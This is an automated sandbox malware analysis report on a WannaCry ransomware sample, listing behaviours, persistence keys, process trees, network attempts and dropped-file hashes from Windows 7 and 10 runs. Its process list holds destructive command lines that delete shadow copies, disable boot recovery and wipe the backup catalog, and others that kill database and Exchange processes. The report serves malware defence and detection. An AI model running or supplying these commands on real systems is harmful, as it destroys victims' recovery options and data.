Malware Analysis Report

2025-03-15 08:19

Sample ID 241020-xh927swdqr
Target WannaCry.exe
SHA256 be22645c61949ad6a077373a7d6cd85e3fae44315632f161adc4c99d5a8e6844
Tags
wannacry defense_evasion discovery execution impact persistence ransomware spyware stealer worm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

be22645c61949ad6a077373a7d6cd85e3fae44315632f161adc4c99d5a8e6844

Threat Level: Known bad

The file WannaCry.exe was found to be: Known bad.

Malicious Activity Summary

wannacry defense_evasion discovery execution impact persistence ransomware spyware stealer worm

Wannacry

Deletes shadow copies

Loads dropped DLL

Reads user/profile data of web browsers

Drops startup file

Executes dropped EXE

Adds Run key to start application

Sets desktop wallpaper using registry

Enumerates physical storage devices

Unsigned PE

System Location Discovery: System Language Discovery

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Interacts with shadow copies

Kills process with taskkill

Suspicious use of SetWindowsHookEx

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-20 18:52

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-20 18:52

Reported

2024-10-20 18:53

Platform

win7-20240903-en

Max time kernel

29s

Max time network

17s

Command Line

"C:\Users\Admin\AppData\Local\Temp\WannaCry.exe"

Signatures

Wannacry

ransomware worm wannacry

Deletes shadow copies

ransomware defense_evasion impact execution

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD6290.tmp C:\Users\Admin\AppData\Local\Temp\WannaCry.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Update Task Scheduler = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\WannaCry.exe\" /r" C:\Users\Admin\AppData\Local\Temp\WannaCry.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\!WannaCryptor!.bmp" C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Pictures\\My Wallpaper.jpg" C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\WannaCry.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\vssadmin.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2692 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2796 wrote to memory of 2508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2796 wrote to memory of 2508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2796 wrote to memory of 2508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2692 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2692 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2692 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2692 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2692 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 2692 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2692 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2692 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2692 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2692 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2204 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2204 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2204 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2692 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2692 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2692 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2692 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 2260 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe C:\Windows\SysWOW64\cmd.exe
PID 2260 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe C:\Windows\SysWOW64\cmd.exe
PID 2260 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe C:\Windows\SysWOW64\cmd.exe
PID 2260 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe C:\Windows\SysWOW64\cmd.exe
PID 2152 wrote to memory of 672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2152 wrote to memory of 672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2152 wrote to memory of 672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2152 wrote to memory of 672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2152 wrote to memory of 1820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2152 wrote to memory of 1820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2152 wrote to memory of 1820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2152 wrote to memory of 1820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\WannaCry.exe

"C:\Users\Admin\AppData\Local\Temp\WannaCry.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c 199441729450364.bat

C:\Windows\SysWOW64\cscript.exe

cscript //nologo c.vbs

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe

!WannaDecryptor!.exe f

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im MSExchange*

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Microsoft.Exchange.*

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im sqlserver.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im sqlwriter.exe

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe

!WannaDecryptor!.exe c

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c start /b !WannaDecryptor!.exe v

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe

!WannaDecryptor!.exe v

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe

!WannaDecryptor!.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\SysWOW64\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

Network

Country Destination Domain Proto
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9150 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9150 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9150 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9150 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9150 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9150 tcp

Files

memory/2692-6-0x0000000010000000-0x0000000010012000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\199441729450364.bat

MD5 3540e056349c6972905dc9706cd49418
SHA1 492c20442d34d45a6d6790c720349b11ec591cde
SHA256 73872a89440a2cba9d22bf4961c3d499ea2c72979c30c455f942374292fedadc
SHA512 c949d147100aef59e382c03abf7b162ae62a4d43456eebd730fbedcf5f95f5e1a24f6e349690d52d75331878a6ee8f6b88a7162ee9cf2a49e142196b12d0133c

C:\Users\Admin\AppData\Local\Temp\c.vbs

MD5 5f6d40ca3c34b470113ed04d06a88ff4
SHA1 50629e7211ae43e32060686d6be17ebd492fd7aa
SHA256 0fb5039a2fe7e90cdf3f22140d7f2103f94689b15609efe0edcc8430dd772fc1
SHA512 4d4aa1abd2c9183202fd3f0a65b37f07ee0166ba6561f094c13c8ea59752c7bdd960e37c49583746d4464bc3b1dc0b63a1fe36a37ce7e5709cd76ed433befe35

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe

MD5 cf1416074cd7791ab80a18f9e7e219d9
SHA1 276d2ec82c518d887a8a3608e51c56fa28716ded
SHA256 78e3f87f31688355c0f398317b2d87d803bd87ee3656c5a7c80f0561ec8606df
SHA512 0bb0843a90edacaf1407e6a7273a9fbb896701635e4d9467392b7350ad25a1bec0c1ceef36737b4af5e5841936f4891436eded0533aa3d74c9a54efa42f024c5

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe.lnk

MD5 3fda739a358c37ea2076ce1e607d0fde
SHA1 0cbdedc919885e77a89cacf172c3d4e87990bf62
SHA256 2d1c8bbf2b0ee5b0d987405353825d9b6b384b54e438dcf7f6732d1d301374d3
SHA512 8c411a9523d54d7d39b74bf0d2b11f11c0854ecf53ede193bf4b1c21dc1182ac2dbe30be90eb7bdc44e50d75505a31b4ae6ef82462ecbb061f90dcd3c1f5ae26

C:\Users\Admin\AppData\Local\Temp\c.wry

MD5 d5826e36a887bf8a4905d3a7df12f8e6
SHA1 b208d89da4bcc9ba38db50f90513e5cff818f1de
SHA256 9e436a4f8eae5ed4836d9883c572612ae11d15761a430d0eae314d96a43ea081
SHA512 b2fb4e33571cbc1b424e9c2b36fbc1c7f8564b00a92df6fb335f8252fdcf5a05dc690de86d762f6e075cf735770d7935f8e3404c2ccb2dda5daef49e1432bdb1

C:\Users\Admin\AppData\Local\Temp\00000000.res

MD5 ed5ab9da13d83bdc391e46465ab4bc17
SHA1 55318809c719624b2fc7964176f2edf38b49f8a0
SHA256 cf2401ebba6104fdcf797a0fc7c2d954b740f2cb529a89b72e784d85a633c543
SHA512 d8bad336070998ecdca1e3a33cca8f02c9943d8f88d3a30e81dfd9d183501b9bc1348125e3b112cb55fb74d10916b1954f1c20410989e0e9b298f2cc32365dcd

C:\Users\Admin\Documents\!Please Read Me!.txt

MD5 afa18cf4aa2660392111763fb93a8c3d
SHA1 c219a3654a5f41ce535a09f2a188a464c3f5baf5
SHA256 227082c719fd4394c1f2311a0877d8a302c5b092bcc49f853a5cf3d2945f42b0
SHA512 4161f250d59b7d4d4a6c4f16639d66d21b2a9606de956d22ec00bedb006643fedbbb8e4cde9f6c0c977285918648314883ca91f3442d1125593bf2605f2d5c6b

C:\Users\Admin\AppData\Local\Temp\00000000.res

MD5 62812f4b112376d366f4a28d1c218cf1
SHA1 e891625e52d04af5989bf453db4aaa12b09b7d3f
SHA256 421b6bcf1be52768a79e71944d889b19bb8f73941fbef6940fb51690b278f9e2
SHA512 17ecf88ac0be2c6ebb2b6ce42705c3f0e101da77ea1914c57a3298b725fc74db448580be4a44b0e15c55d4ecbbe5bfaa15f24e3eec0b280e6ca96efa33d0520d

C:\Users\Admin\AppData\Local\Temp\m.wry

MD5 980b08bac152aff3f9b0136b616affa5
SHA1 2a9c9601ea038f790cc29379c79407356a3d25a3
SHA256 402046ada270528c9ac38bbfa0152836fe30fb8e12192354e53b8397421430d9
SHA512 100cda1f795781042b012498afd783fd6ff03b0068dbd07b2c2e163cd95e6c6e00755ce16b02b017693c9febc149ed02df9df9b607e2b9cca4b07e5bd420f496

C:\Users\Admin\AppData\Local\Temp\00000000.res

MD5 31c4681a11006590913153dd14906699
SHA1 6e7678e716f27552698e008c0b2c97ea6ead5a5b
SHA256 1cccef862e69ad81ecd62dfbba6daad0f786b261fe52104852f3b6cf3d12df99
SHA512 1e4802c6e9c52ee4522d2a66d6c03f0490065c84e298cc8f5b08e64d6ee5407c672a790570634507fdb01874926b56616519a895f8a0431f2084f488b20a050f

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-20 18:52

Reported

2024-10-20 18:53

Platform

win10v2004-20241007-en

Max time kernel

30s

Max time network

31s

Command Line

"C:\Users\Admin\AppData\Local\Temp\WannaCry.exe"

Signatures

Wannacry

ransomware worm wannacry

Deletes shadow copies

ransomware defense_evasion impact execution

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDAAC9.tmp C:\Users\Admin\AppData\Local\Temp\WannaCry.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDAAEF.tmp C:\Users\Admin\AppData\Local\Temp\WannaCry.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Update Task Scheduler = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\WannaCry.exe\" /r" C:\Users\Admin\AppData\Local\Temp\WannaCry.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\!WannaCryptor!.bmp" C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\WannaCry.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
